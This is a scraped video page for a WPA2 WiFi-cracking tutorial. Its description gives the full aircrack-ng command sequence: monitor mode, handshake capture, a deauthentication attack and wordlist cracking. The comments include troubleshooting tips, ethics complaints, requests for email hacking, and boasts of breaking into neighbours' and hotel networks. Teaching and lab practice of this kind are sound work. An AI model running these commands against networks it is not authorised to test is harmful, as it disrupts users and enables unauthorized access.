Тёмный

Cracking WiFi WPA2 Handshake 

David Bombal
Подписаться 2,6 млн
Просмотров 2,1 млн
50% 1

Наука

Опубликовано:

 

27 сен 2024

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 1,6 тыс.   
@davidbombal
@davidbombal 3 года назад
Menu: Use airmon-ng to crack WiFi networks: 0:00 Network Adapter to use: 0:46 Kali Linux setup: 1:20 Plug in network adapter: 1:35 Verify that network adapter is recognized by Kali Linux: 2:04 WPA2 network to crack: 2:43 iwconfig: 3:27 Kali Version: 3:34 Kill conflicting processes with airmon-ng: 3:55 Put interface into monitor mode: 4:32 Discover WiFi Networks with airodump-ng: 5:15 Use airodump-ng to view only one network: 6:20 Connect to network using an iPhone: 6:39 airodump-ng capture WPA2 four way handshake: 6:58 Use aireplay-ng to deauthenticate clients: 7:25 WPA2 four way handshake captured: 8:08 Use Wireshark to view WPA2 four way handshake: 8:38 Put interface back into managed mode: 9:30 Crack WPA2 password with aircrack-ng: 10:10 Password cracked: 11:00 WiFi router WPA2 settings: 12:00 Summary: 12:40 ================ Network Adapters: ================ Alfa AWUS036NHA: amzn.to/3qbQGKN Alfa AWUSO36NH: amzn.to/3moeQiI ================ Commands used: ================ ! See version of Kali cat /etc/os-release uname -a ! See interfaces ip addr iwconfig !kill processes sudo airmon-ng check kill !Start monitor mode sudo airmon-ng start wlan0 !Verify that monitor mode is used sudo airmon-ng !You could also use iwconfig to check that interface is in monitor mode: iwconfig ! Get the AP's MAC address and channel sudo airodump-ng wlan0mon ! AP-MAC & channel - you need to select your own here: ESSID: 90:9A:4A:B8:F3:FB Channel used by AP for SSID: 2 !1st Window: !Make sure you replace the channel number and bssid with your own !Replace hack1 with your file name like capture1 or something sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon !2nd Window - deauth attack !Make sure you replace the bssid with your own sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon !Use Wireshark to open hack file wireshark hack1-01.cap !Filter Wireshark messages for EAPOL eapol !Stop monitor mode airmon-ng stop wlan0mon !Crack file with Rock you or another wordlist !Make sure you have rockyou in text format (unzip file on Kali) !Replace hack1-01.cap with your file name aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt ================ Previous videos: ================ Kali Installation: ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-VAMP8DqSDjg.html WPA2 GPU password cracking: ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-J8A8rKFZW-M.html Wordlists (rockyou): ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-rgWcguAg-XA.html ================ Connect with me: ================ Discord: discord.com/invite/usKSyzb Twitter: twitter.com/davidbombal Instagram: instagram.com/davidbombal LinkedIn: www.linkedin.com/in/davidbombal Facebook: facebook.com/davidbombal.co TikTok: tiktok.com/@davidbombal RU-vid: ru-vid.com ================ Support me: ================ Buy my CCNA course and support me: DavidBombal.com: CCNA ($10): bit.ly/yt999ccna Udemy CCNA Course: bit.ly/ccnafor10dollars GNS3 CCNA Course: CCNA ($10): bit.ly/gns3ccna10 ====================== Special Offers: ====================== Boson software: 15% discount Link: bit.ly/boson15 Code: DBAF15P Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
@AjaySharma-007
@AjaySharma-007 3 года назад
You way to explain is very good ,please keep it up... Please make some video on windows admin password bypass or hacking or email account hacking ..Thanks
@wilfredocal8557
@wilfredocal8557 3 года назад
please hack my neighbors wifi
@mobiousenigma
@mobiousenigma 3 года назад
your teaching thieves or want to be thieves! the man pages for aircrack-ng and others in the suite is more than enough information or tutorial for any ethical use! fortunately the reality of wpa2 with 1x8^120 to 1x64^120 possibilities and roughly a 3000 keys per second with descent hardware a 100 to 10000 year run is unpractical. collecting ssid and handshakes and mac addresses is easy dose not even require linux or monitor mode but brute forcing any strong password over 14 chars long is not going to happen , you should examine your ethics sir because your audience isnt going to set up a pertest lab or ask permission of a network owner no matter how many times you ask them not to! anyone with any true interest in pen testing will have enough system and network admin knowledge to be functional with a man page nor would they require the detailed explanations you give on basic principals. hopefully no one you care about becomes a victim of someone you taught
@itsme7570
@itsme7570 3 года назад
Hey, I've followed this tutorial and for some reason my deauth attack isn't working. I've even tried mdk4 and it's just not kicking me from the network and not capturing the handshake. I've looked all over the internet for a solution but have yet to find one. So now I ask you! David Bombal community, if you are here then you are most likely highly intelligent. How about sharing some knowledge with your boy
@mobiousenigma
@mobiousenigma 3 года назад
@@itsme7570 you followed the tutorial and its not working....... do you understand what you are doing? its a signal strength issue...you have one radio connected to another and a third is trying to say louder no not that radio this one.....but it isnt louder than the first radio so you get squat....now why are you trying to learn how to steal?
@x00-p3z
@x00-p3z 3 года назад
After watching first video in your channel, It took only 2 minutes to decide weather i want to subscribe your channel or not. Love this. Such an awesome presentation. ♥
@XYElement72
@XYElement72 2 года назад
Does WiFi hacking damage the phone's battery? Is there a virus that can damage the battery through Wi-Fi?
@69rogefer
@69rogefer Год назад
Hey! Mr. David Bombal, thanks a million. I am from Tijuana, Mexico, I am 53, and I just get this "KALI LINUX" os, with knowing nothing what so ever about this LINUX SYSTEM. So, as you can imagine, I've whatched so many video tutorials, and well, I'm a little confused with all this commands, and passwords, but I'm doing a little progres in understanding the basics. And let me tell you, that until I watched your video here, I finally get to run the tools in the AIRCRACK-NG SUITE. The way you exp;ain step by step, it"s so clear, THAT EVEN ME GET TO UNDERSTAND WHAT TO DO, AND WHAT EXACTLY IS THE PROGRAM DOING WITH EACH ONE OF THE COMMANDS. THANK YOU SIR. I hope that my written engish is not so bad, and you get may gratitude.
@gleannemilan9421
@gleannemilan9421 17 дней назад
We all heard you. God bless you my friend.
@aty4282
@aty4282 3 года назад
David: only attack networks that *you own* Me: well, i basically "own" the network after im in- *gets sent to gulag*
@saiyajin_broly
@saiyajin_broly 3 года назад
Lol🤣🤣
@truepvp5463
@truepvp5463 2 года назад
LOOOOL BWAHAHAH
@mariojules1814
@mariojules1814 7 месяцев назад
hahaha
@shawnmendrek3544
@shawnmendrek3544 5 месяцев назад
loled so hard, because I understand.
@ak11230
@ak11230 3 года назад
I am computer consultant 1991 Melbourne Fl . Degree in electric engineering major computer input -output I did make living recovering , braking password , Old days 500 dollars maybe 1 hours ? Upset employees password all network and quit many times . . I really thanks You David deep from my heart for educating young people ... We needed that in America ...
@KacangNgoding
@KacangNgoding 3 года назад
Ah, finally, I found a proper way to learn about network security.
@deckieb1
@deckieb1 3 года назад
I am 56 and you make this all so interesting and easy. I love what you do and cant thank you enough for educating me.
@paulmacgiollacaoine8619
@paulmacgiollacaoine8619 3 года назад
Such a great format, you make it seem so simple ❤️👍
@pasihiltunen4041
@pasihiltunen4041 2 года назад
hello
@sandalysandaly6000
@sandalysandaly6000 3 года назад
I must say that you are indeed an excellent teacher. You did not explain what to do after I have the HANDSHAKE I'll be glad to hear from you. Thank you very much.
@RO-rw4hs
@RO-rw4hs 10 месяцев назад
He said you can crack it
@shawnmendrek3544
@shawnmendrek3544 5 месяцев назад
Just look it up.
@Steve_be
@Steve_be 3 года назад
This for me is the best presented shows on YT its given me so much pleasure and being retired keeps me busy lerning thank you sir.
@dr.-a
@dr.-a 3 года назад
I Love your setup and the blue back light, your way of explaining things is very easy to understand, you should consider teaching a CEH course online or in Udemy Thank You Sir Mad Respect 🙏🏼
@stevenjacobs4329
@stevenjacobs4329 2 года назад
He teaches on Udemy too, amazing teacher. courses are free on youtube but for people that can afford they can support him on Udemy
@Billofx...
@Billofx... Год назад
u b naija boss man
@nonegone7170
@nonegone7170 3 года назад
Brilliantly made video as we've all come to expect from you, David. Really invigorates the motivation to keep at it. Keep it up!
@davidbombal
@davidbombal 3 года назад
Thank you!
@Manishkumar-dj6kl
@Manishkumar-dj6kl 3 года назад
@@davidbombal sir plz make video on how to create backdoor through wifi🙏
@TheOneAndOnlyNomad
@TheOneAndOnlyNomad 8 месяцев назад
@@Manishkumar-dj6kl that's sound mighty like malicious intent
@aryamannkhare9505
@aryamannkhare9505 10 дней назад
Loved it! It's 5:30 in the morning and I had a great time doing this:)
@78inn
@78inn 3 года назад
You are my favorite. You talk so clearly and demonstrate in clean way.
@asdfssdfghgdfy5940
@asdfssdfghgdfy5940 Год назад
Something I'd recommend if you are using kali in a live environment (i.e. it isn't your main system you are doing anything on) is to sudo su so you don't have to type sudo before every command. Especially useful when you are learning.
@user-vk2cd9qw7i
@user-vk2cd9qw7i Год назад
yeah make sure it's not your main system LOL I don't want to think about how much data has been lost to people not realizing they're superuser and rm rf ing their whole file system
@asdfssdfghgdfy5940
@asdfssdfghgdfy5940 Год назад
@@user-vk2cd9qw7i or in the case of Gitlab using it on the wrong system
@itzuleanu
@itzuleanu 8 месяцев назад
I followed a lot of tutorials but none worked but this worked for me thanks men i appreciate it ❤❤
@garcand
@garcand 3 года назад
David, you have been killing it with hacking videos! Thank you Sir, you're a great teacher !
@davidbombal
@davidbombal 3 года назад
Thank you Andrew!
@peterbefreebrothasandsista2465
@peterbefreebrothasandsista2465 3 года назад
I get get locked up for it yet he gets a fucking superstardom even gets paid for it the fucking irony.
@notahacker2107
@notahacker2107 3 года назад
@@peterbefreebrothasandsista2465 because he’s not using it as a black hat hacker that’s why.
@peterbefreebrothasandsista2465
@peterbefreebrothasandsista2465 3 года назад
Deven I think you miss the point for those that will use it for malicious intentions like noobs and the likes of he has give a demonstration of the very thing and precise education on how to he might as well have done now giving as incompetent it be presenting yourself to be a cyber security specialist it’s a bit of irony don’t you think of teaching people how to crack a WiFi network what’s it for other cyber security analysts that would already have taught that it college or perhaps anywhere else that give a recognised certificate in giving you implement security against such things what’s is it for a reminder on how to do it right or perhaps a procedure just in case you checking for vulnerability’s or the strength of the key the point is Deven that he is showing the world as in how to crack a network illegally on a public platform which I think you missed wither he is using it for black hat or not or he considers himself white he has give a class on how break into a WiFi network why not teach as it’s presented how to stop such attacks as in a class on ips or ids with maybe how to compile a firewall like P-fense highlighted comment well if someone breaks into my network i will tell the government it’s cyber analyst taught them how and hold them to account the fucking irony he’s not using it for black-hat he might as well.
@nabildahmani8286
@nabildahmani8286 2 года назад
@@davidbombal what's the attack name and the protocol used ??????
@arnaldogonzalez1
@arnaldogonzalez1 2 года назад
backtrack was my introduction to Linux / cybersecurity back in 2008. So glad that I kept digging at it, best decision ever
@sunderskoranga
@sunderskoranga 8 месяцев назад
My lenovo laptop has intel wireless adapter with monitor capablity. Installed kali linux on usb drive and cracked the password. Great tutorial. Thanks.
@emiyakiritsugu6329
@emiyakiritsugu6329 3 месяца назад
Can you please help me? Iam in the same situation as you with a rtl8723be that let's me get it into monitor mode and all.. I installed live Kali Linux on my USB drive and tried to crack wifi with it but ah I just cant get the password at the last moment.. it always shows "key not found" And most of the time I can't even get the Wpa handshake while doing the de-auth thing
@facttrendz1314
@facttrendz1314 3 года назад
while(True): print("David sir is great")
@ShahroZ-Gaming
@ShahroZ-Gaming 3 года назад
True
@tharaneetharanvaradan1498
@tharaneetharanvaradan1498 3 года назад
David sir is great
@jshecut4117
@jshecut4117 3 года назад
Infinite compliments once one bro!🔥
@MichaelBeamTheMan
@MichaelBeamTheMan 9 месяцев назад
Great video. I'm 55 years old and just starting my path. I have always loved technology. My parents would drop me at radio shack and I would play on the old tandy's for hours. I learned alot from this video and it helped me to make more sense of things. Thanks for sharing.
@pelegkislasi8723
@pelegkislasi8723 6 месяцев назад
You got it!!
@johnskrabut7235
@johnskrabut7235 2 года назад
Just a heads up, the router ESSID names you have redacted are visible for a brief period of time between timestamp 6:49 and 6:50. Also, thank you for the video! Very informative and simplified.
@khalidnoor2556
@khalidnoor2556 2 года назад
idk why but after doing airodump-ng i dont discover any wifi
@Alex-ln9on
@Alex-ln9on Год назад
Hey, try airmon-ng check kill
@Alex-ln9on
@Alex-ln9on Год назад
Make sure your network adapter supports monitor mode and packet injection.
@SilverWolf-rz4bq
@SilverWolf-rz4bq Год назад
​@@khalidnoor2556btw did you figure it out? cos even I'm facing the same issue here
@sankalpnaik877
@sankalpnaik877 Год назад
​@@SilverWolf-rz4bqdid u figure out
@rxop184
@rxop184 2 года назад
it requires a huge practical knowledge and consistent practice to be like u :)
@ParzTheDon
@ParzTheDon 3 года назад
Do you have classes? I'm grown but if my parents ever asked me who i wanted to be like when i grew up, i would say: David Bombal LOL
@mosqali1970
@mosqali1970 3 года назад
Hahahaha nice
@arko1830
@arko1830 3 года назад
Yes he does
@jamesdickson3631
@jamesdickson3631 3 года назад
I will say the same. He is my role model
@terrorkaze486
@terrorkaze486 3 года назад
Network Chuck
@jamesdickson3631
@jamesdickson3631 3 года назад
@@RandomVideosN.S.WAustralia yes he n Zaid Sabith ( Ireland) are great too.
@leosaravia01
@leosaravia01 2 года назад
Very nice info, there's still no better way to crack WPA2.... only if the WPS is active. Which version kali are you using? And that terminal looks so clean! very nice set up!
@ThomasCoote89
@ThomasCoote89 2 месяца назад
"I have to say this or I get into trouble" God that really got me, subscribed
@joelsquispe5645
@joelsquispe5645 3 года назад
Very well explained. I'm starting in cybersecurity thanks to you! :)
@davidbombal
@davidbombal 3 года назад
Thank you Joel. That's fantastic!
@TravelToday1
@TravelToday1 3 года назад
hey thank u but there is a problem when I type sudo airman-ng its still on wlan0 not wlan0mon why???
@misterz5908
@misterz5908 2 года назад
I know many people have told you What I am about to tell you. You are the best!👍😎
@NontonSaja_
@NontonSaja_ 3 года назад
Subscriber : How many your ROUTER? David : Yes
@CyberAbyss007
@CyberAbyss007 3 года назад
Thanks for the great content! I've done some of this in Virtual Box. I did notice that VMs can be picky about the brand or version of wi-fi devices. Some better than others. Looking forward to duplicating this video in my lab environment. :-)
@mobiousenigma
@mobiousenigma 3 года назад
its the adapters chipset some do not support instructions given in airx-ng ,,and vms in general have issues with internal hardware and ownership so usb adapters sidestep that issue
@harvindersingh4411
@harvindersingh4411 2 года назад
@@mobiousenigmaI am using kali in a virtual box but it won't show me the wireless network as it reads that network as an internal network and shows it as a wired network (eth0) instead. How to fix it?
@mobiousenigma
@mobiousenigma 2 года назад
@@harvindersingh4411 its not broken thats how virtual machines work. if you want wireless in a virtual desktop it needs to be usb.
@harvindersingh4411
@harvindersingh4411 2 года назад
@@mobiousenigma So that means I can't use the internal adapter as a wireless network in virtual box?
@mobiousenigma
@mobiousenigma 2 года назад
@@harvindersingh4411 dual boot
@backupmemories897
@backupmemories897 6 месяцев назад
10:26 xD ah i remember now why I abandon this xD the brute force part.
@niklasd6149
@niklasd6149 7 месяцев назад
Thank you, very straight forward. I like that. You talk about the vital things without nonsens. That is a real pro.
@theodorecandela3415
@theodorecandela3415 3 года назад
When I put my card in monitor mode and remove it from monitor mode with the airmon-ng commands , iw dev still shows it in monitor mode. Also airmon-ng doesn't rename it to wlan0mon, it stays at wlan0, but monitor mode works.
@krakowiaczek1939
@krakowiaczek1939 2 года назад
did you find the solution to the problem? i have tl-wn725n, and i can't start wlan0mon :(
@Dnsx_plus
@Dnsx_plus 2 года назад
Not me getting a cancer ad before trying to hack my neighbors Wi-Fi
@tunsaree
@tunsaree 11 месяцев назад
😭😭😭
@cthoadmin7458
@cthoadmin7458 3 года назад
Hi David, you seem to be a cut above the other RU-vid presenters in this subject. I suspected you might be a professional presenter, and it looks like you are... QUESTION: do you have a course or series of courses that would get me to a stage where I could sit for the Cisco CCNA exams with a reasonable expectation of passing them? Then maybe the CCNA Security specialties? Money no object my company will pay...
@elsoyboy3977
@elsoyboy3977 2 года назад
Excelente video, thank you so much, I saw many blogs and they didn't explain as good as you. I thought I wouldn't find videos like this in RU-vid jajaja.
@jasondevaladares8391
@jasondevaladares8391 10 месяцев назад
AMAZINGLY well put together, researched and shown. This helped me with a CTF I was doing.
@shawnmendrek3544
@shawnmendrek3544 5 месяцев назад
This
@ryanlea750
@ryanlea750 2 года назад
A great video we went over this in class I had notes to the best of the circumstances lectures happen fast. This helped me fill in the holes. Great video. Thank you!
@Nexalian_Gamer
@Nexalian_Gamer 7 месяцев назад
Thanks for the tutorial. Been using my neighbor's wifi for 3 months now. It only took my Pi 30 minutes to crack the password 👍👍
@silviacarlosamachasoy8189
@silviacarlosamachasoy8189 3 года назад
Hola. Te quería agradecer por tu gran conocimiento aportado, me ha sido de mucha utilidad para manejar este sistema. Cuidate y gracias ☺️👍
@campursarimania
@campursarimania 10 месяцев назад
just happen to have a TPLink WN722 layin around and doing test on my own network. tutorial works great. thank you
@marco201ful
@marco201ful 3 года назад
Keep it coming!!!! But please update your Udemy course with these Videos 😁
@Headcase0570
@Headcase0570 Год назад
I'm a bit late to this party, but thank you for the clear instructions in this video! In what video did you use a GPU to crack a non-listed password?
@sunuy192
@sunuy192 Год назад
respectfully, search it up
@suriyasundaram5987
@suriyasundaram5987 3 года назад
hey david... although i did all the steps correctly after the deauthentication i dont get a wpa handshake .. pls help me through this
@happygujjar7254
@happygujjar7254 3 года назад
Same here bro didn't get the wpa handshake
@msubhietamam5720
@msubhietamam5720 3 года назад
You will not getting the handshake if there was no known device try to connect to the network. You need to wait until a known device connecting to the target wifi. It consumes time.
@happygujjar7254
@happygujjar7254 3 года назад
@@msubhietamam5720 ok got your point. You make me to dive into again.
@msubhietamam5720
@msubhietamam5720 3 года назад
@@happygujjar7254 happy cracking then! 😊
@sidmovich
@sidmovich Год назад
Thank you for the lesson, finaly learned how to use aireplay and etc, doing all this lesson steps via a rapsberrypi 3b+ , in the end it takes about 8 hours or more to crack the password, if aircrack can do it, probably better to store the .cap file in a usb drive and crack it using my main pc to see the results (do this on your own network, deauth will make the network unusable while running, so probably your neighbor that makes a lot of noise will notice it)
@noobpubg3371
@noobpubg3371 2 года назад
External WiFi network adapter is necessary or we can do that with out this?
@ScryptStudios1
@ScryptStudios1 2 месяца назад
When you mentioned ‘decrypting’ or ‘hacking’ the password, I believe you meant ‘cracking the hash.’ Hashes are not encrypted data; they are the result of a hashing function. In the context of capturing a Wi-Fi hash, the correct term is ‘crack the hash’ correct? love your videos.
@juancamilomedinagarzon1375
@juancamilomedinagarzon1375 3 года назад
Mil gracias amigo los subtitulos traducidos funcionan perfectamente y se te entiende muy bien.
@MrRahul123919
@MrRahul123919 3 года назад
Hello sir. I hv seen lots n lots video different kind of tutorials. But the ur way of explanation. It really outstanding. It's very feel us easy even hard concept
@gojo1825
@gojo1825 4 месяца назад
Nothing is working for me 😞
@PriyankaSinghChauhan-xq8ty
@PriyankaSinghChauhan-xq8ty 4 месяца назад
Me too
@Mr.X-xyz
@Mr.X-xyz 3 месяца назад
What's is the problem?
@unitedummah72
@unitedummah72 3 месяца назад
​@@Mr.X-xyz My laptop logout automatically and the network which i connected is automatically disconnected
@mohammadrahimtaheri5134
@mohammadrahimtaheri5134 3 года назад
lesson of the day "The best way to predict the future is to create it." Thanks a lot for creating this video i really enjoyed watching it and yeah you have a new subscriber.
@RaceRageYT
@RaceRageYT 3 года назад
Bruh you just copied another comment!
@hamzausman7801
@hamzausman7801 2 года назад
After a long time I found a suitable video. Thanks man. And I also wanna request that will you please upload videos on teaching c++, http and other programming languages.
@EW-mb1ih
@EW-mb1ih 2 года назад
nice video but lots of the time, the password used by people is the default password under the internet box. I reckon it's more difficult to crack than a "hello hello" password... What do you think?
@slashingbison2503
@slashingbison2503 2 года назад
Great training video learnt a lot, had a few issues along the way that were resolved and my understanding is much better, hope i can start to remember some commands there is so much syntax is Linux.
@MrJ0mmy
@MrJ0mmy 7 месяцев назад
wpa handshake never get captured :(
@rubiolouis
@rubiolouis 2 года назад
It worked!, I owe you so much, thank you David. My best Regards!
@auldcrow1461
@auldcrow1461 2 года назад
Clear tutorial, you gained a sub. Unsure why 318 folk disliked this
@gp_sec
@gp_sec 3 года назад
*once again im attacking my own network for demonstration purposes* got me haha
@DirtyFan2
@DirtyFan2 Год назад
Can you do this without a router using phone's wifi? Do you need a router for this? Is this possible to do without kali linux using just macOS?
@giannisigona5830
@giannisigona5830 9 месяцев назад
I’m trying to make a deauther with a rpi0 and a 2.4/5 ghz WiFi adaptor and it works but it only disconnects all phones on the network no pc are affected I’m using airmon-ng and have been working on this for a very long time so any help would be appreciated thanks
@masisosipyan4459
@masisosipyan4459 3 года назад
Sir, what to do if I do have not the wlan0, but my adapter is plugged in?
@flixqtt
@flixqtt 6 месяцев назад
my network adapter was showing networks yesterday, but not today? nothing shows up anymore
@griffindragon3562
@griffindragon3562 2 года назад
So you say it uses brute Force attack?
@vulkanoss3798
@vulkanoss3798 2 года назад
Well thanks to your tuto I've changed my Hotel GUEST wifi 1MB/s to Admin's WiFi with full speed
@RaulGarcia-kr4mx
@RaulGarcia-kr4mx 2 года назад
I’m trying to do my own wifi and it keeps saying no such bssid. What am I doing wrong?
@x00-p3z
@x00-p3z 3 года назад
You have good contents as always... Always you are complete with the topic which you are streaming
@optimalreview8368
@optimalreview8368 2 года назад
At 4:58 I successfully changed to Monitor mode, but the name of the connection is still "wlan0". I tried it as a root user as well. I can't follow the next steps, because I can't see connections. What do you think what should I do to be able to witch it to "wlan0mon" properly? Any idea what should I change or fix? Thanks.
@deanbp4
@deanbp4 3 года назад
What camera and lighting do you use for your video presentations? It all looks very good.
@trojankit
@trojankit Год назад
Hi David, please on your vmware configuration, did you use NAT or Bridged network to work with the adapter...thanks... I'll appreciate a response
@MilanJosipovic
@MilanJosipovic Год назад
Hi David, great stuff as always. One question - when we deauth a device (phone), will that device try to connect to the access point by itself or we must manually connect it to the access point?
@stephenstrange4090
@stephenstrange4090 Год назад
it will try to connect by itself
@ivanboard777
@ivanboard777 3 года назад
Thank You A Lot Mr.David, very helpful videos. Greetings From Milano, Italy :-D
@davidbombal
@davidbombal 3 года назад
You are welcome!
@keypo790
@keypo790 2 года назад
when you get blocked from dad's wifi because youre deauthenticating a "fatherless little brother" who stays up late in the morning...we do a little trolling😂
@keypo790
@keypo790 2 года назад
~you know, I'm something of an ethical myself
@havishgahlot6542
@havishgahlot6542 3 года назад
Thanks sir for the information you explain each and every command which makes it easier to understand...... Love from India!
@tulgaa07
@tulgaa07 Год назад
Love your videos, very informative :) Question: I run my Kali on Parallels on a M1 Macbook. Would the adapters work for me?
@cdm297
@cdm297 3 года назад
Excellent video David. Out of curiosity how did you get your terminal prompt to look so beautiful. Mine looks sooo plain... Can you please share the secret? 🙏👍👌
@yogasudarga6904
@yogasudarga6904 10 месяцев назад
ada banyak masalah sebenarnya menggunakan aircrack-ng tapi slama saya ini aircrack sangat efektif dibanding yang lain..itu tergantung anda membuat daftar sandi dan perangkat yang anda pakai..dan terkahir seberapa kuat anda mengoprasikan aircrack..the best tools
@_ADL650_
@_ADL650_ 3 месяца назад
david : just for educational purpose me: keep deauthing neighbors wifi
@seifahmed24
@seifahmed24 2 года назад
i have to tell you that you are great..this is the best channel i have ever seen ,and you have a talent in explaination..i would like to thank you,,and i hope some lessons about data recovery..please.
@hamed2011
@hamed2011 3 года назад
With all respect this methods you demonstrated sir was in my grad ma ages and my high school hobbies and too old... Talk about rainbow tables or bypassing methods or GPU crackling
@Archive-zv7mc
@Archive-zv7mc 3 года назад
wonderful good work and very informative video on wifi cracking than other youtubers
@GeorgeKinopoulos
@GeorgeKinopoulos Год назад
Ευχαριστώ για αυτό το υπέροχο μάθημα David!
@void1737
@void1737 3 года назад
So the only way to hack a WPA 2 is brute-forcing it?
@not_más
@not_más 3 года назад
Yep, or MiTM. Really the best options.
@willfettu2747
@willfettu2747 3 месяца назад
Happy Saturday David ;)
@peyn8
@peyn8 11 месяцев назад
I will never think in attacking any network bu mine, pinky promess... keep creating awesome content! my (neigh..) own wifi network needs to be cracked!
@AImotivationa-x6w
@AImotivationa-x6w 3 дня назад
first time watching this video it was complicated and didn't make sense to me, because i just wanted to hack the Wi-Fi but now I have learned kali Linux and have some clue in this game I understand you and your videos are so helpful 🔥🔥. but I would not recommend for beginners to watch you😂
@hansvanderlinden6545
@hansvanderlinden6545 3 года назад
Thanks David. Learned a lot. Appreciate your tranquility when you're talking. It makes it easy to follow. I want to use the learnings for hardening my own security. In this respect my two questions are the following. I use mac address authentication for my wireless LAN (as opposed to wifi internet access for guests) and the SSID for it is not being broadcasted. Makes these two measures my LAN more difficult to hack. Thanks for your answer in advance.
@M.JO.Massarweh
@M.JO.Massarweh 2 года назад
Key not found
@jokerarafa2427
@jokerarafa2427 2 месяца назад
7:42 it is output : wlan0 is on channel 7, but the AP uses channel 4 How can I fix that
@CoachAnand
@CoachAnand 3 года назад
the adaptor you used is version 1 I guess. The codes are not working with the version 3 adapter of TP-LINK WN722n
@Maudernized
@Maudernized 6 месяцев назад
Why am I not picking up the WPA handshake no matter how many times I try to reconnect to my target wifi in the aireplay-ng deauth step?
@3dWorldTechnology
@3dWorldTechnology 2 года назад
Sir when I find eapol in wireshark is not show any files with this name
@I_Cant_Think_Of_A_Name
@I_Cant_Think_Of_A_Name Год назад
Hi David! I know I am late to the party, but would this method work for someone running Mac OS and using an USB-3 to USB-C adapter for the network adapter?
@BeyondLumen
@BeyondLumen 2 месяца назад
When around the command to kill everything and then switch my wireless adapter from from managed to monitor mode it still remains as WLAN zero but physically the adapter is dead there's no LED status light
@live.sports717
@live.sports717 8 месяцев назад
Dear Mr. Bombal, I would like to express my gratitude for your valuable videos and training. I have a significant inquiry regarding my role as a network engineer in a small broadcasting company. Our company's network is DHCP-based, utilizing Cisco Catalyst 3560 switches. Currently, all users are able to connect to the internet by simply plugging into wall jacks, which aligns with our company policy. However, a major issue arises when users configure and connect WiFi routers to the network, creating their own separate WiFi networks alongside the company network. I am seeking guidance on how to effectively prevent this unauthorized practice. Thank you for your attention to this matter.
@crazygermanviper
@crazygermanviper 4 месяца назад
I tried this with my Kali Linux and it doesn't work. The deauth method does not deauthenticate the stations, so without this there is not reconnect thus not allowing for the capture of a 4 way handshake.
@gtheentreprenerd7207
@gtheentreprenerd7207 Год назад
David I really like your channel, the more and more I watch your video. I Lovve how descriptive you are explaining things
@ayze3718
@ayze3718 2 года назад
Well explained David you did a great job 😎👍
@ramgopalkrishnapandu
@ramgopalkrishnapandu 3 года назад
Clear and crisp... Thanks for the video... you nailed it.. :-)
@Petrusiliuszwackelmann
@Petrusiliuszwackelmann Год назад
In my house we have not only one WLAN router we got one downstairs on in the living one on the bedroom and on the roof . When I am looking now with the airmon-ng tool I see multiple names of the name of my wifi ... Wich one should I coose or does all work the same if I wanna get the Handshake 😢
@AhmedAli-il5yx
@AhmedAli-il5yx 3 года назад
You have such a great and easy way of explanation. Thank you for providing such valuable information
Далее
Get a cert, get a hacking job? #CEH #OSCP
23:59
Просмотров 99 тыс.
3 Levels of WiFi Hacking
22:12
Просмотров 2 млн
CORTE DE CABELO RADICAL
00:59
Просмотров 1,7 млн
Brute force WiFi WPA2
12:17
Просмотров 934 тыс.
Instagram OSiNT
9:45
Просмотров 1,9 млн
I will own your WiFi with one Kali Linux command
13:55
WiFi hacking like Mr Robot (with OTW)
36:35
Просмотров 257 тыс.
Top 10 Hacking Tools In Kali Linux You Must Know.
7:31
CED: часть 1
23:37
Просмотров 44 тыс.
Hardware tools repair tool high performance tool
0:16
Wi-fi с бесконечным паролем 😱
0:18
CED: часть 1
23:37
Просмотров 44 тыс.